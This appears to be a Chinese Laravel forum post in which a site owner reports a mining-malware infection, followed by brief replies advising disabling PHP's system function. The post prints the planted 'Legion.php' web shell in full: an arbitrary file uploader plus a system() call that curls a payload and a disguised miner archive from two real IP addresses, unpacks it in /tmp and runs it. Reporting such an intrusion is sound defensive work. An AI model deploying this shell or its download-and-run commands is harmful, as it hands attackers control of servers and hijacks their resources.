网站被注入挖矿程序

当前Larvel版本是5.5.9

<?php echo '<center><h1>LEGION EXPLOIT V4 (Năvodari Power)</h1>' . '<br>' . '[uname] ' . php_uname() . ' [/uname] ';
echo '<form method="post"enctype="multipart/form-data">';
echo '<input type="file"name="file"><input name="_upl"type="submit"value="Upload"></form>';
if ($_POST['_upl'] == "Upload") {
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo '<b>LEGION Exploit Success!</b>';
    } else {
        echo '<b>LEGION Exploit Success!</b>';
    }
}
system('curl -s -k 2.57.122.112/rce/load -o adindex.php; cd /tmp; curl -O 91.210.168.80/miner.jpg; tar xzvf miner.jpg > /dev/null; rm -rf miner.jpg; cd .x; ./x > /dev/null');
?>

对方通过Legion这个扫描工具,在public目录下写入上面这Legion.php

《L02 从零构建论坛系统》
以构建论坛项目 LaraBBS 为线索,展开对 Laravel 框架的全面学习。应用程序架构思路贴近 Laravel 框架的设计哲学。
《G01 Go 实战入门》
从零开始带你一步步开发一个 Go 博客项目,让你在最短的时间内学会使用 Go 进行编码。项目结构很大程度上参考了 Laravel。
讨论数量: 5

禁用 system 函数

3年前 评论
happyqian_ah (楼主) 3年前

我现在只有 0.00001 个 BTC

file

3年前 评论
haodudecao 3年前

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容,与人为善,比聪明更重要!